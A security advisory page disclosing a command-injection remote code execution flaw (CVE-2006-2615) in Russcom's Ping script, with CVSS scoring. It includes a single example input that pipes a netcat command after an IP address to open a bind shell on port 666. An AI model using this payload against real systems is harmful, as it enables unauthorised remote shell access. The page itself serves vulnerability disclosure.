Bug: Russcom Ping Remote code execution ( Ascii Version )

Search:
WLB2

Russcom Ping Remote code execution

Published
Credit
Risk
2006.05.27
zerogue gmail com
High
CWE
CVE
Local
Remote
N/A
CVE-2006-2615
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

Russcom Ping Remote code execution

Discovered by: Nomenumbra

Date: 21/5/2006

impact:high (Remote code execution)

Russcom's Ping script allows attackers to execute

arbitrary code trough command piping after the ip (e.g 127.0.0.1 | nc -l -p 666 -e /bin/sh would grant a bindshell)

Nomenumbra

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version